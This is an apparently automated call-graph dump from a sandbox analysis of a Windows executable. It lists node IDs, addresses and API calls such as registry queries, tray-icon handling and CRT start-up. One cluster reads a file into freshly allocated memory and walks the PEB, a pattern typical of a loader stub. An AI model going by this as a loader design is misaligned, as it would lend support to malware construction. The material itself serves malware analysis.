100937->100938 100939 56493f 100937->100939 100941 5649a0 100938->100941 100940 582d40 __cinit 67 API calls 100939->100940 100940->100938 100942 567667 59 API calls 100941->100942 100943 5649b8 GetVersionExW 100942->100943 100944 567bcc 59 API calls 100943->100944 100945 5649fb 100944->100945 100946 567d2c 59 API calls 100945->100946 100949 564a28 100945->100949 100947 564a1c 100946->100947 100969 567726 100947->100969 100950 564a93 GetCurrentProcess IsWow64Process 100949->100950 100951 59d864 100949->100951 100952 564aac 100950->100952 100953 564ac2 100952->100953 100954 564b2b GetSystemInfo 100952->100954 100965 564b37 100953->100965 100955 564af8 100954->100955 100955->100933 100958 564ad4 100961 564b37 2 API calls 100958->100961 100959 564b1f GetSystemInfo 100960 564ae9 100959->100960 100960->100955 100962 564aef FreeLibrary 100960->100962 100963 564adc GetNativeSystemInfo 100961->100963 100962->100955 100963->100960 100966 564ad0 100965->100966 100967 564b40 LoadLibraryA 100965->100967 100966->100958 100966->100959 100967->100966 100968 564b51 GetProcAddress 100967->100968 100968->100966 100970 567734 100969->100970 100971 567d2c 59 API calls 100970->100971 100972 567744 100971->100972 100972->100949 100973 10a4cdb 100974 10a4ce2 100973->100974 100975 10a4cea 100974->100975 100976 10a4d80 100974->100976 100980 10a4990 100975->100980 100993 10a5630 9 API calls 100976->100993 100979 10a4d67 100994 10a2380 100980->100994 100983 10a4a60 CreateFileW 100985 10a4a6d 100983->100985 100990 10a4a2f 100983->100990 100984 10a4a89 VirtualAlloc 100984->100985 100986 10a4aaa ReadFile 100984->100986 100987 10a4c8a 100985->100987 100988 10a4c7c VirtualFree 100985->100988 100986->100985 100989 10a4ac8 VirtualAlloc 100986->100989 100987->100979 100988->100987 100989->100985 100989->100990 100990->100984 100990->100985 100991 10a4b90 CloseHandle 100990->100991 100992 10a4ba0 VirtualFree 100990->100992 100997 10a58a0 GetPEB 100990->100997 100991->100990 100992->100990 100993->100979 100999 10a5840 GetPEB 100994->100999 100996 10a2a0b 100996->100990 100998 10a58ca 100997->100998 100998->100983 101000 10a586a 100999->101000 101000->100996 101001 561055 101006 562649 101001->101006 101004 582d40 __cinit 67 API calls 101005 561064 101004->101005 101007 567667 59 API calls 101006->101007 101008 5626b7 101007->101008 101013 563582 101008->101013 101010 562754 101012 56105a 101010->101012 101016 563416 59 API calls 2 library calls 101010->101016 101012->101004 101017 5635b0 101013->101017 101016->101010 101018 5635a1 101017->101018 101019 5635bd 101017->101019 101018->101010 101019->101018 101020 5635c4 RegOpenKeyExW 101019->101020 101020->101018 101021 5635de RegQueryValueExW 101020->101021 101022 563614 RegCloseKey 101021->101022 101023 5635ff 101021->101023 101022->101018 101023->101022 101024 563633 101025 56366a 101024->101025 101026 5636e7 101025->101026 101027 563688 101025->101027 101064 5636e5 101025->101064 101029 59d0cc 101026->101029 101030 5636ed 101026->101030 101031 563695 101027->101031 101032 56374b PostQuitMessage 101027->101032 101028 5636ca DefWindowProcW 101066 5636d8 101028->101066 101073 571070 10 API calls Mailbox 101029->101073 101033 563715 SetTimer RegisterWindowMessageW 101030->101033 101034 5636f2 101030->101034 101036 5636a0 101031->101036 101037 59d154 101031->101037 101032->101066 101041 56373e CreatePopupMenu 101033->101041 101033->101066 101038 59d06f 101034->101038 101039 5636f9 KillTimer 101034->101039 101042 563755 101036->101042 101043 5636a8 101036->101043 101089 5c2527 71 API calls _memset 101037->101089 101047 59d0a8 MoveWindow 101038->101047 101048 59d074 101038->101048 101069 56443a Shell_NotifyIconW _memset 101039->101069 101040 59d0f3 101074 571093 331 API calls Mailbox 101040->101074 101041->101066 101071 5644a0 64 API calls _memset 101042->101071 101051 59d139 101043->101051 101052 5636b3 101043->101052 101045 59d166 101045->101028 101045->101066 101047->101066 101056 59d078 101048->101056 101057 59d097 SetFocus 101048->101057 101051->101028 101088 5b7c36 59 API calls Mailbox 101051->101088 101053 5636be 101052->101053 101054 59d124 101052->101054 101053->101028 101075 56443a Shell_NotifyIconW _memset 101053->101075 101087 5c2d36 81 API calls _memset 101054->101087 101055 563764 101055->101066 101056->101053 101059 59d081 101056->101059 101057->101066 101058 56370c 101070 563114 DeleteObject DestroyWindow Mailbox 101058->101070 101072 571070 10 API calls Mailbox 101059->101072 101064->101028 101067 59d118 101076 56434a 101067->101076 101069->101058 101070->101066 101071->101055 101072->101066 101073->101040 101074->101053 101075->101067 101077 564375 _memset 101076->101077 101090 564182 101077->101090 101080 5643fa 101082 564414 Shell_NotifyIconW 101080->101082 101083 564430 Shell_NotifyIconW 101080->101083 101084 564422 101082->101084 101083->101084 101094 56407c 101084->101094 101086 564429 101086->101064 101087->101055 101088->101064 101089->101045 101091 564196 101090->101091 101092 59d423 101090->101092 101091->101080 101116 5c2f94 62 API calls _W_store_winword 101091->101116 101092->101091 101093 59d42c DestroyIcon 101092->101093 101093->101091 101095 56416f Mailbox 101094->101095 101096 564098 101094->101096 101095->101086 101117 567a16 101096->101117 101099 59d3c8 LoadStringW 101103 59d3e2 101099->101103 101100 5640b3 101101 567bcc 59 API calls 101100->101101 101102 5640c8 101101->101102 101102->101103 101104 5640d9 101102->101104 101105 567b2e 59 API calls 101103->101105 101106 564174 101104->101106 101107 5640e3 101104->101107 101110 59d3ec 101105->101110 101131 568047 101106->101131 101122 567b2e 101107->101122 101113 5640ed _memset _wcscpy 101110->101113 101135 567cab 101110->101135 101112 59d40e 101114 567cab 59 API calls 101112->101114 101115 564155 Shell_NotifyIconW 101113->101115 101114->101113 101115->101095 101116->101080 101118 580db6 Mailbox 59 API calls 101117->101118 101119 567a3b 101118->101119 101120 568029 59 API calls 101119->101120 101121 5640a6 101120->101121 101121->101099 101121->101100 101123 59ec6b 101122->101123 101124 567b40 101122->101124 101148 5b7bdb 59 API calls _memmove 101123->101148 101142 567a51 101124->101142 101127 567b4c 101127->101113 101128 59ec75 101129 568047 59 API calls 101128->101129 101130 59ec7d Mailbox 101129->101130 101132 568052 101131->101132 101133 56805a 101131->101133 101149 567f77 59 API calls 2 library calls 101132->101149 101133->101113 101136 59ed4a 101135->101136 101137 567cbf 101135->101137 101139 568029 59 API calls 101136->101139 101150 567c50 101137->101150 101141 59ed55 __NMSG_WRITE _memmove 101139->101141 101140 567cca 101140->101112 101143 567a5f 101142->101143 101147 567a85 _memmove 101142->101147 101144 580db6 Mailbox 59 API calls 101143->101144 101143->101147 101145 567ad4 101144->101145 101146 580db6 Mailbox 59 API calls 101145->101146 101146->101147 101147->101127 101148->101128 101149->101133 101151 567c5f __NMSG_WRITE 101150->101151 101152 567c70 _memmove 101151->101152 101153 568029 59 API calls 101151->101153 101152->101140 101154 59ed07 _memmove 101153->101154 101155 5a416f 101159 5b5fe6 101155->101159 101157 5a417a 101158 5b5fe6 85 API calls 101157->101158 101158->101157 101164 5b6020 101159->101164 101167 5b5ff3 101159->101167 101160 5b6022 101189 569328 84 API calls Mailbox 101160->101189 101161 5b6027 101170 569837 101161->101170 101164->101157 101166 567b2e 59 API calls 101166->101164 101167->101160 101167->101161 101167->101164 101168 5b601a 101167->101168 101188 5695a0 59 API calls _wcsstr 101168->101188 101171 569851 101170->101171 101183 56984b 101170->101183 101172 59f5d3 __i64tow 101171->101172 101173 569899 101171->101173 101175 569857 __itow 101171->101175 101179 59f4da 101171->101179 101194 583698 83 API calls 3 library calls 101173->101194 101178 580db6 Mailbox 59 API calls 101175->101178 101176 59f552 Mailbox _wcscpy 101195 583698 83 API calls 3 library calls 101176->101195 101180 569871 101178->101180 101179->101176 101181 580db6 Mailbox 59 API calls 101179->101181 101180->101183 101190 567de1 101180->101190 101185 59f51f 101181->101185 101183->101166 101184 580db6 Mailbox 59 API calls 101186 59f545 101184->101186 101185->101184 101186->101176 101187 567de1 59 API calls 101186->101187 101187->101176 101188->101164 101189->101161 101191 567df0 __NMSG_WRITE _memmove 101190->101191 101192 580db6 Mailbox 59 API calls 101191->101192 101193 567e2e 101192->101193 101193->101183 101194->101175 101195->101172 101196 59fdfc 101201 56ab30 Mailbox _memmove 101196->101201 101200 580db6 59 API calls Mailbox 101200->101201 101201->101200 101202 56b525 101201->101202 101220 56a057 101201->101220 101223 567de1 59 API calls 101201->101223 101226 569f37 Mailbox 101201->101226 101230 56b2b6 101201->101230 101233 5a086a 101201->101233 101235 5a0878 101201->101235 101237 5a085c 101201->101237 101238 56b21c 101201->101238 101242 5b6e8f 59 API calls 101201->101242 101245 5ddf37 101201->101245 101248 5ddf23 101201->101248 101253 569ea0 101201->101253 101277 569c90 59 API calls Mailbox 101201->101277 101281 5dc193 85 API calls 2 library calls 101201->101281 101282 5dc2e0 96 API calls Mailbox 101201->101282 101283 5c7956 59 API calls Mailbox 101201->101283 101284 5dbc6b 331 API calls Mailbox 101201->101284 101285 5b617e 59 API calls Mailbox 101201->101285 101287 5c9e4a 89 API calls 4 library calls 101202->101287 101205 56b47a 101206 5a09e5 101205->101206 101207 5a0055 101205->101207 101293 5c9e4a 89 API calls 4 library calls 101206->101293 101286 5c9e4a 89 API calls 4 library calls 101207->101286 101211 56b475 101216 568047 59 API calls 101211->101216 101212 580db6 59 API calls Mailbox 101212->101226 101213 568047 59 API calls 101213->101226 101214 5a0064 101216->101220 101219 567667 59 API calls 101219->101226 101221 582d40 67 API calls __cinit 101221->101226 101222 5b6e8f 59 API calls 101222->101226 101223->101201 101224 5a09d6 101292 5c9e4a 89 API calls 4 library calls 101224->101292 101226->101205 101226->101207 101226->101211 101226->101212 101226->101213 101226->101219 101226->101220 101226->101221 101226->101222 101226->101224 101227 56a55a 101226->101227 101251 56c8c0 331 API calls 2 library calls 101226->101251 101252 56b900 60 API calls Mailbox 101226->101252 101291 5c9e4a 89 API calls 4 library calls 101227->101291 101280 56f6a3 331 API calls 101230->101280 101289 569c90 59 API calls Mailbox 101233->101289 101290 5c9e4a 89 API calls 4 library calls 101235->101290 101237->101220 101288 5b617e 59 API calls Mailbox 101237->101288 101278 569d3c 60 API calls Mailbox 101238->101278 101240 56b22d 101279 569d3c 60 API calls Mailbox 101240->101279 101242->101201 101294 5dcadd 101245->101294 101247 5ddf47 101247->101201 101249 5dcadd 130 API calls 101248->101249 101250 5ddf33 101249->101250 101250->101201 101251->101226 101252->101226 101254 569ebf 101253->101254 101266 569eed Mailbox 101253->101266 101255 580db6 Mailbox 59 API calls 101254->101255 101255->101266 101256 56b475 101257 568047 59 API calls 101256->101257 101270 56a057 101257->101270 101258 56b47a 101260 5a09e5 101258->101260 101261 5a0055 101258->101261 101259 580db6 59 API calls Mailbox 101259->101266 101424 5c9e4a 89 API calls 4 library calls 101260->101424 101421 5c9e4a 89 API calls 4 library calls 101261->101421 101262 567667 59 API calls 101262->101266 101266->101256 101266->101258 101266->101259 101266->101261 101266->101262 101267 582d40 67 API calls __cinit 101266->101267 101268 568047 59 API calls 101266->101268 101266->101270 101273 5b6e8f 59 API calls 101266->101273 101274 5a09d6 101266->101274 101276 56a55a 101266->101276 101419 56c8c0 331 API calls 2 library calls 101266->101419 101420 56b900 60 API calls Mailbox 101266->101420 101267->101266 101268->101266 101269 5a0064 101269->101201 101270->101201 101273->101266 101423 5c9e4a 89 API calls 4 library calls 101274->101423 101422 5c9e4a 89 API calls 4 library calls 101276->101422 101277->101201 101278->101240 101279->101230 101280->101202 101281->101201 101282->101201 101283->101201 101284->101201 101285->101201 101286->101214 101287->101237 101288->101220 101289->101237 101290->101237 101291->101220 101292->101206 101293->101220 101295 569837 84 API calls 101294->101295 101296 5dcb1a 101295->101296 101315 5dcb61 Mailbox 101296->101315 101332 5dd7a5 101296->101332 101298 5dcdb9 101299 5dcf2e 101298->101299 101303 5dcdc7 101298->101303 101382 5dd8c8 92 API calls Mailbox 101299->101382 101302 5dcf3d 101302->101303 101305 5dcf49 101302->101305 101345 5dc96e 101303->101345 101304 569837 84 API calls 101323 5dcbb2 Mailbox 101304->101323 101305->101315 101310 5dce00 101360 580c08 101310->101360 101313 5dce1a 101366 5c9e4a 89 API calls 4 library calls 101313->101366 101314 5dce33 101367 5692ce 101314->101367 101315->101247 101318 5dce25 GetCurrentProcess TerminateProcess 101318->101314 101323->101298 101323->101304 101323->101315 101364 5dfbce 59 API calls 2 library calls 101323->101364 101365 5dcfdf 61 API calls 2 library calls 101323->101365 101324 5dcfa4 101324->101315 101328 5dcfb8 FreeLibrary 101324->101328 101325 5dce6b 101379 5dd649 107 API calls _free 101325->101379 101328->101315 101330 5dce7c 101330->101324 101380 568d40 59 API calls Mailbox 101330->101380 101381 569d3c 60 API calls Mailbox 101330->101381 101383 5dd649 107 API calls _free 101330->101383 101333 567e4f 59 API calls 101332->101333 101334 5dd7c0 CharLowerBuffW 101333->101334 101384 5bf167 101334->101384 101338 567667 59 API calls 101339 5dd7f9 101338->101339 101391 56784b 101339->101391 101341 5dd810 101342 567d2c 59 API calls 101341->101342 101343 5dd81c Mailbox 101342->101343 101344 5dd858 Mailbox 101343->101344 101404 5dcfdf 61 API calls 2 library calls 101343->101404 101344->101323 101346 5dc9de 101345->101346 101347 5dc989 101345->101347 101351 5dda50 101346->101351 101348 580db6 Mailbox 59 API calls 101347->101348 101350 5dc9ab 101348->101350 101349 580db6 Mailbox 59 API calls 101349->101350 101350->101346 101350->101349 101352 5ddc79 Mailbox 101351->101352 101358 5dda73 _strcat _wcscpy __NMSG_WRITE 101351->101358 101352->101310 101353 569b98 59 API calls 101353->101358 101354 569be6 59 API calls 101354->101358 101355 569b3c 59 API calls 101355->101358 101356 569837 84 API calls 101356->101358 101357 58571c 58 API calls _W_store_winword 101357->101358 101358->101352 101358->101353 101358->101354 101358->101355 101358->101356 101358->101357 101408 5c5887 61 API calls 2 library calls 101358->101408 101362 580c1d 101360->101362 101361 580cb5 VirtualProtect 101363 580c83 101361->101363 101362->101361 101362->101363 101363->101313 101363->101314 101364->101323 101365->101323 101366->101318 101368 5692d6 101367->101368 101369 580db6 Mailbox 59 API calls 101368->101369 101370 5692e4 101369->101370 101371 5692f0 101370->101371 101409 5691fc 59 API calls Mailbox 101370->101409 101373 569050 101371->101373 101410 569160 101373->101410 101375 56905f 101376 580db6 Mailbox 59 API calls 101375->101376 101377 5690fb 101375->101377 101376->101377 101377->101330 101378 568d40 59 API calls Mailbox 101377->101378 101378->101325 101379->101330 101380->101330 101381->101330 101382->101302 101383->101330 101386 5bf192 __NMSG_WRITE 101384->101386 101385 5bf1d1 101385->101338 101385->101343 101386->101385 101387 5bf278 101386->101387 101390 5bf1c7 101386->101390 101387->101385 101406 5678c4 61 API calls 101387->101406 101390->101385 101405 5678c4 61 API calls 101390->101405 101392 5678b7 101391->101392 101393 56785a 101391->101393 101395 567d2c 59 API calls 101392->101395 101393->101392 101394 567865 101393->101394 101397 59eb09 101394->101397 101398 567880 101394->101398 101396 567888 _memmove 101395->101396 101396->101341 101400 568029 59 API calls 101397->101400 101407 567f27 59 API calls Mailbox 101398->101407 101401 59eb13 101400->101401 101402 580db6 Mailbox 59 API calls 101401->101402 101403 59eb33 101402->101403 101404->101344 101405->101390 101406->101387 101407->101396 101408->101358 101409->101371 101411 569169 Mailbox 101410->101411 101412 59f19f 101411->101412 101417 569173 101411->101417 101413 580db6 Mailbox 59 API calls 101412->101413 101415 59f1ab 101413->101415 101414 56917a 101414->101375 101417->101414 101418 569c90 59 API calls Mailbox 101417->101418 101418->101417 101419->101266 101420->101266 101421->101269 101422->101270 101423->101260 101424->101270 101425 10a4730 101426 10a2380 GetPEB 101425->101426 101427 10a481c 101426->101427 101439 10a4620 101427->101439 101440 10a4629 Sleep 101439->101440 101441 10a4637 101440->101441 101442 56107d 101447 56708b 101442->101447 101444 56108c 101445 582d40 __cinit 67 API calls 101444->101445 101446 561096 101445->101446 101448 56709b __ftell_nolock 101447->101448 101449 567667 59 API calls 101448->101449 101450 567151 101449->101450 101478 564706 101450->101478 101452 56715a 101485 58050b 101452->101485 101455 567cab 59 API calls 101456 567173 101455->101456 101491 563f74 101456->101491 101459 567667 59 API calls 101460 56718b 101459->101460 101497 567d8c 101460->101497 101462 567194 RegOpenKeyExW 101463 59e8b1 RegQueryValueExW 101462->101463 101467 5671b6 Mailbox 101462->101467 101464 59e8ce 101463->101464 101465 59e943 RegCloseKey 101463->101465 101466 580db6 Mailbox 59 API calls 101464->101466 101465->101467 101471 59e955 _wcscat Mailbox __NMSG_WRITE 101465->101471 101468 59e8e7 101466->101468 101467->101444 101501 56522e 101468->101501 101469 5679f2 59 API calls 101469->101471 101471->101467 101471->101469 101476 567de1 59 API calls 101471->101476 101477 563f74 59 API calls 101471->101477 101473 59e90f 101474 567bcc 59 API calls 101473->101474 101475 59e929 101474->101475 101475->101465 101476->101471 101477->101471 101504 591940 101478->101504 101481 567de1 59 API calls 101482 564739 101481->101482 101506 564750 101482->101506 101484 564743 Mailbox 101484->101452 101486 591940 __ftell_nolock 101485->101486 101487 580518 GetFullPathNameW 101486->101487 101488 58053a 101487->101488 101489 567bcc 59 API calls 101488->101489 101490 567165 101489->101490 101490->101455 101492 563f82 101491->101492 101496 563fa4 _memmove 101491->101496 101494 580db6 Mailbox 59 API calls 101492->101494 101493 580db6 Mailbox 59 API calls 101495 563fb8 101493->101495 101494->101496 101495->101459 101496->101493 101498 567da6 101497->101498 101500 567d99 101497->101500 101499 580db6 Mailbox 59 API calls 101498->101499 101499->101500 101500->101462 101502 580db6 Mailbox 59 API calls 101501->101502 101503 565240 RegQueryValueExW 101502->101503 101503->101473 101503->101475 101505 564713 GetModuleFileNameW 101504->101505 101505->101481 101507 591940 __ftell_nolock 101506->101507 101508 56475d GetFullPathNameW 101507->101508 101509 56477c 101508->101509 101510 564799 101508->101510 101511 567bcc 59 API calls 101509->101511 101512 567d8c 59 API calls 101510->101512 101513 564788 101511->101513 101512->101513 101514 567726 59 API calls 101513->101514 101515 564794 101514->101515 101515->101484 101516 587c56 101517 587c62 _fprintf 101516->101517 101553 589e08 GetStartupInfoW 101517->101553 101520 587c67 101555 588b7c GetProcessHeap 101520->101555 101521 587cbf 101522 587cca 101521->101522 101638 587da6 58 API calls 3 library calls 101521->101638 101556 589ae6 101522->101556 101525 587cd0 101526 587cdb __RTC_Initialize 101525->101526 101639 587da6 58 API calls 3 library calls 101525->101639 101577 58d5d2 101526->101577 101529 587cea 101530 587cf6 GetCommandLineW 101529->101530 101640 587da6 58 API calls 3 library calls 101529->101640 101596 594f23 GetEnvironmentStringsW 101530->101596 101533 587cf5 101533->101530 101536 587d10 101537 587d1b 101536->101537 101641 5830b5 58 API calls 3 library calls 101536->101641 101606 594d58 101537->101606 101540 587d21 101541 587d2c 101540->101541 101642 5830b5 58 API calls 3 library calls 101540->101642 101620 5830ef 101541->101620 101544 587d34 101545 587d3f __wwincmdln 101544->101545 101643 5830b5 58 API calls 3 library calls 101544->101643 101626 5647d0 101545->101626 101548 587d53 101549 587d62 101548->101549 101644 583358 58 API calls _doexit 101548->101644 101645 5830e0 58 API calls _doexit 101549->101645 101552 587d67 _fprintf 101554 589e1e 101553->101554 101554->101520 101555->101521 101646 583187 36 API calls 2 library calls 101556->101646 101558 589aeb 101647 589d3c InitializeCriticalSectionAndSpinCount __ioinit 101558->101647 101560 589af0 101561 589af4 101560->101561 101649 589d8a TlsAlloc 101560->101649 101648 589b5c 61 API calls 2 library calls 101561->101648 101564 589af9 101564->101525 101565 589b06 101565->101561 101566 589b11 101565->101566 101650 5887d5 101566->101650 101569 589b53 101658 589b5c 61 API calls 2 library calls 101569->101658 101572 589b58 101572->101525 101573 589b32 101573->101569 101574 589b38 101573->101574 101657 589a33 58 API calls 4 library calls 101574->101657 101576 589b40 GetCurrentThreadId 101576->101525 101578 58d5de _fprintf 101577->101578 101579 589c0b __lock 58 API calls 101578->101579 101580 58d5e5 101579->101580 101581 5887d5 __calloc_crt 58 API calls 101580->101581 101582 58d5f6 101581->101582 101583 58d661 GetStartupInfoW 101582->101583 101584 58d601 @_EH4_CallFilterFunc@8 _fprintf 101582->101584 101590 58d676 101583->101590 101593 58d7a5 101583->101593 101584->101529 101585 58d86d 101672 58d87d LeaveCriticalSection _doexit 101585->101672 101587 5887d5 __calloc_crt 58 API calls 101587->101590 101588 58d7f2 GetStdHandle 101588->101593 101589 58d805 GetFileType 101589->101593 101590->101587 101592 58d6c4 101590->101592 101590->101593 101591 58d6f8 GetFileType 101591->101592 101592->101591 101592->101593 101670 589e2b InitializeCriticalSectionAndSpinCount 101592->101670 101593->101585 101593->101588 101593->101589 101671 589e2b InitializeCriticalSectionAndSpinCount 101593->101671 101597 587d06 101596->101597 101598 594f34 101596->101598 101602 594b1b GetModuleFileNameW 101597->101602 101673 58881d 58 API calls 2 library calls 101598->101673 101600 594f5a _memmove 101601 594f70 FreeEnvironmentStringsW 101600->101601 101601->101597 101603 594b4f _wparse_cmdline 101602->101603 101605 594b8f _wparse_cmdline 101603->101605 101674 58881d 58 API calls 2 library calls 101603->101674 101605->101536 101607 594d71 __NMSG_WRITE 101606->101607 101611 594d69 101606->101611 101608 5887d5 __calloc_crt 58 API calls 101607->101608 101616 594d9a __NMSG_WRITE 101608->101616 101609 594df1 101610 582d55 _free 58 API calls 101609->101610 101610->101611 101611->101540 101612 5887d5 __calloc_crt 58 API calls 101612->101616 101613 594e16 101615 582d55 _free 58 API calls 101613->101615 101615->101611 101616->101609 101616->101611 101616->101612 101616->101613 101617 594e2d 101616->101617 101675 594607 58 API calls __filbuf 101616->101675 101676 588dc6 IsProcessorFeaturePresent 101617->101676 101619 594e39 101619->101540 101621 5830fb __IsNonwritableInCurrentImage 101620->101621 101699 58a4d1 101621->101699 101623 583119 __initterm_e 101624 582d40 __cinit 67 API calls 101623->101624 101625 583138 _doexit __IsNonwritableInCurrentImage 101623->101625 101624->101625 101625->101544 101627 5647ea 101626->101627 101637 564889 101626->101637 101628 564824 IsThemeActive 101627->101628 101702 58336c 101628->101702 101632 564850 101714 5648fd SystemParametersInfoW SystemParametersInfoW 101632->101714 101634 56485c 101715 563b3a 101634->101715 101636 564864 SystemParametersInfoW 101636->101637 101637->101548 101638->101522 101639->101526 101640->101533 101644->101549 101645->101552 101646->101558 101647->101560 101648->101564 101649->101565 101651 5887dc 101650->101651 101653 588817 101651->101653 101655 5887fa 101651->101655 101659 5951f6 101651->101659 101653->101569 101656 589de6 TlsSetValue 101653->101656 101655->101651 101655->101653 101667 58a132 Sleep 101655->101667 101656->101573 101657->101576 101658->101572 101660 595201 101659->101660 101665 59521c 101659->101665 101661 59520d 101660->101661 101660->101665 101668 588b28 58 API calls __getptd_noexit 101661->101668 101663 59522c RtlAllocateHeap 101663->101665 101666 595212 101663->101666 101665->101663 101665->101666 101669 5833a1 DecodePointer 101665->101669 101666->101651 101667->101655 101668->101666 101669->101665 101670->101592 101671->101593 101672->101584 101673->101600 101674->101605 101675->101616 101677 588dd1 101676->101677 101682 588c59 101677->101682 101681 588dec 101681->101619 101683 588c73 _memset __call_reportfault 101682->101683 101684 588c93 IsDebuggerPresent 101683->101684 101690 58a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101684->101690 101687 588d7a 101689 58a140 GetCurrentProcess TerminateProcess 101687->101689 101688 588d57 __call_reportfault 101691 58c5f6 101688->101691 101689->101681 101690->101688 101692 58c5fe 101691->101692 101693 58c600 IsProcessorFeaturePresent 101691->101693 101692->101687 101695 59590a 101693->101695 101698 5958b9 5 API calls 2 library calls 101695->101698 101697 5959ed 101697->101687 101698->101697 101700 58a4d4 EncodePointer 101699->101700 101700->101700 101701 58a4ee 101700->101701 101701->101623 101703 589c0b __lock 58 API calls 101702->101703 101704 583377 DecodePointer EncodePointer 101703->101704 101767 589d75 LeaveCriticalSection 101704->101767 101706 564849 101707 5833d4 101706->101707 101708 5833f8 101707->101708 101709 5833de 101707->101709 101708->101632 101709->101708 101768 588b28 58 API calls __getptd_noexit 101709->101768 101711 5833e8 101769 588db6 9 API calls __filbuf 101711->101769 101713 5833f3 101713->101632 101714->101634 101716 563b47 __ftell_nolock 101715->101716 101717 567667 59 API calls 101716->101717 101718 563b51 GetCurrentDirectoryW 101717->101718 101770 563766 101718->101770 101720 563b7a IsDebuggerPresent 101721 59d272 MessageBoxA 101720->101721 101722 563b88 101720->101722 101724 59d28c 101721->101724 101722->101724 101725 563ba5 101722->101725 101754 563c61 101722->101754 101723 563c68 SetCurrentDirectoryW 101729 563c75 Mailbox 101723->101729 101969 567213 59 API calls Mailbox 101724->101969 101851 567285 101725->101851 101729->101636 101730 563bc3 GetFullPathNameW 101732 567bcc 59 API calls 101730->101732 101731 59d29c 101734 59d2b2 SetCurrentDirectoryW 101731->101734 101733 563bfe 101732->101733 101867 57092d 101733->101867 101734->101729 101737 563c1c 101738 563c26 101737->101738 101970 5b874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101737->101970 101883 563a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101738->101883 101742 59d2cf 101742->101738 101744 59d2e0 101742->101744 101746 564706 61 API calls 101744->101746 101745 563c30 101747 563c43 101745->101747 101749 56434a 68 API calls 101745->101749 101748 59d2e8 101746->101748 101891 5709d0 101747->101891 101751 567de1 59 API calls 101748->101751 101749->101747 101753 59d2f5 101751->101753 101752 563c4e 101752->101754 101968 56443a Shell_NotifyIconW _memset 101752->101968 101755 59d2ff 101753->101755 101756 59d324 101753->101756 101754->101723 101758 567cab 59 API calls 101755->101758 101759 567cab 59 API calls 101756->101759 101760 59d30a 101758->101760 101761 59d320 GetForegroundWindow ShellExecuteW 101759->101761 101762 567b2e 59 API calls 101760->101762 101764 59d354 Mailbox 101761->101764 101765 59d317 101762->101765 101764->101754 101766 567cab 59 API calls 101765->101766 101766->101761 101767->101706 101768->101711 101769->101713 101771 567667 59 API calls 101770->101771 101772 56377c 101771->101772 101971 563d31 101772->101971 101774 56379a 101775 564706 61 API calls 101774->101775 101776 5637ae 101775->101776 101777 567de1 59 API calls 101776->101777 101778 5637bb 101777->101778 101985 564ddd 101778->101985 101781 59d173 102041 5c955b 101781->102041 101782 5637dc Mailbox 101786 568047 59 API calls 101782->101786 101785 59d192 101788 582d55 _free 58 API calls 101785->101788 101789 5637ef 101786->101789 101790 59d19f 101788->101790 102009 56928a 101789->102009 101792 564e4a 84 API calls 101790->101792 101794 59d1a8 101792->101794 101798 563ed0 59 API calls 101794->101798 101795 567de1 59 API calls 101796 563808 101795->101796 102012 5684c0 101796->102012 101800 59d1c3 101798->101800 101799 56381a Mailbox 101801 567de1 59 API calls 101799->101801 101802 563ed0 59 API calls 101800->101802 101803 563840 101801->101803 101804 59d1df 101802->101804 101805 5684c0 69 API calls 101803->101805 101806 564706 61 API calls 101804->101806 101808 56384f Mailbox 101805->101808 101807 59d204 101806->101807 101809 563ed0 59 API calls 101807->101809 101811 567667 59 API calls 101808->101811 101810 59d210 101809->101810 101812 568047 59 API calls 101810->101812 101813 56386d 101811->101813 101814 59d21e 101812->101814 102016 563ed0 101813->102016 101816 563ed0 59 API calls 101814->101816 101818 59d22d 101816->101818 101824 568047 59 API calls 101818->101824 101820 563887 101820->101794 101821 563891 101820->101821 101822 582efd _W_store_winword 60 API calls 101821->101822 101823 56389c 101822->101823 101823->101800 101825 5638a6 101823->101825 101826 59d24f 101824->101826 101827 582efd _W_store_winword 60 API calls 101825->101827 101828 563ed0 59 API calls 101826->101828 101829 5638b1 101827->101829 101830 59d25c 101828->101830 101829->101804 101831 5638bb 101829->101831 101830->101830 101832 582efd _W_store_winword 60 API calls 101831->101832 101833 5638c6 101832->101833 101833->101818 101834 563907 101833->101834 101836 563ed0 59 API calls 101833->101836 101834->101818 101835 563914 101834->101835 101837 5692ce 59 API calls 101835->101837 101838 5638ea 101836->101838 101839 563924 101837->101839 101840 568047 59 API calls 101838->101840 101841 569050 59 API calls 101839->101841 101842 5638f8 101840->101842 101843 563932 101841->101843 101844 563ed0 59 API calls 101842->101844 102032 568ee0 101843->102032 101844->101834 101846 563995 Mailbox 101846->101720 101847 56928a 59 API calls 101848 56394f 101847->101848 101848->101846 101848->101847 101849 568ee0 60 API calls 101848->101849 101850 563ed0 59 API calls 101848->101850 101849->101848 101850->101848 101852 567292 __ftell_nolock 101851->101852 101853 59ea22 _memset 101852->101853 101854 5672ab 101852->101854 101857 59ea3e GetOpenFileNameW 101853->101857 101855 564750 60 API calls 101854->101855 101856 5672b4 101855->101856 102661 580791 101856->102661 101859 59ea8d 101857->101859 101860 567bcc 59 API calls 101859->101860 101862 59eaa2 101860->101862 101862->101862 101864 5672c9 102679 56686a 101864->102679 101868 57093a __ftell_nolock 101867->101868 102922 566d80 101868->102922 101870 57093f 101882 563c14 101870->101882 102933 57119e 89 API calls 101870->102933 101872 57094c 101872->101882 102934 573ee7 91 API calls Mailbox 101872->102934 101874 570955 101875 570959 GetFullPathNameW 101874->101875 101874->101882 101876 567bcc 59 API calls 101875->101876 101877 570985 101876->101877 101878 567bcc 59 API calls 101877->101878 101879 570992 101878->101879 101880 5a4cab _wcscat 101879->101880 101881 567bcc 59 API calls 101879->101881 101881->101882 101882->101731 101882->101737 101884 563ab0 LoadImageW RegisterClassExW 101883->101884 101885 59d261 101883->101885 102967 563041 7 API calls 101884->102967 102968 5647a0 LoadImageW EnumResourceNamesW 101885->102968 101888 563b34 101890 5639d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101888->101890 101889 59d26a 101890->101745 101892 5a4cc3 101891->101892 101904 5709f5 101891->101904 103104 5c9e4a 89 API calls 4 library calls 101892->103104 101894 570cfa 101894->101752 101897 570ee4 101897->101894 101899 570ef1 101897->101899 101898 570a4b PeekMessageW 101967 570a05 Mailbox 101898->101967 103102 571093 331 API calls Mailbox 101899->103102 101902 570ef8 LockWindowUpdate DestroyWindow GetMessageW 101902->101894 101906 570f2a 101902->101906 101903 570ce4 101903->101894 103101 571070 10 API calls Mailbox 101903->103101 